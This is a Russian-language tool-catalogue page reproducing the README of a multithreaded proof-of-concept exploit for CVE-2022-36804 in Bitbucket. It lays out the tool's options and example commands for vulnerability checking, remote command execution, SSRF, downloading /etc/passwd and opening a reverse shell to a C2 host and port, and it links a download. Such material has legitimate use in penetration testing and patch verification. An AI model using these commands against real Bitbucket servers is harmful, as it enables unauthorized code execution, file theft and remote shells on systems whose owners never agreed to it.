Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/notxesh/cve-2022-36804-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubnotxesh/cve-2022-36804-poc

CVE-2022-36804-PoC

Многопоточный скрипт эксплойта для CVE-2022-36804, затрагивающий версии BitBucket <8.3.1

Репозиторий
1883 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-36804-PoC

Многопоточный эксплойт-скрипт для CVE-2022-36804, затрагивающего (большинство) версий BitBucket <8.3.1. Полное описание уязвимости см. здесь: https://jira.atlassian.com/browse/BSERV-13438

Вся заслуга в обнаружении принадлежит TheGrandPew

Скрипт автоматически обнаруживает публичные репозитории, расположенные на экземплярах Bitbucket, а затем выбирает случайный репозиторий для проверки или эксплуатации уязвимости. Если публичных репозиториев нет, для эксплуатации известных уязвимых экземпляров требуется действительный cookie 'BITBUCKETSESSIONID'.

PoC был разработан для приёма нескольких хостов на входе и передачи уязвимых хостов в stdout, что позволяет направлять результаты по конвейеру для обработки другими инструментами.

Не используйте в злонамеренных целях.

Использование

root@kitploit:~
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level

Режимы эксплуатации

Проверка

Одиночный хост

CVE-2022-36804.py http://bitbucket.local:7990/

Несколько хостов и передача уязвимых хостов и эксплуатированных репозиториев в файл через конвейер

CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts

RCE (удалённое выполнение кода)

CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

SSRF (подделка запросов на стороне сервера)

Выполняет DNS-запрос к указанному knary

CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/

Скачивание

Скачивает репозиторий с целевым файлом /etc/passwd; сжатый репозиторий будет сохранён под случайным именем файла.

CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Rev_shell (создаёт обратную sh-оболочку для указанного хоста и порта)

CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

Скачать инструмент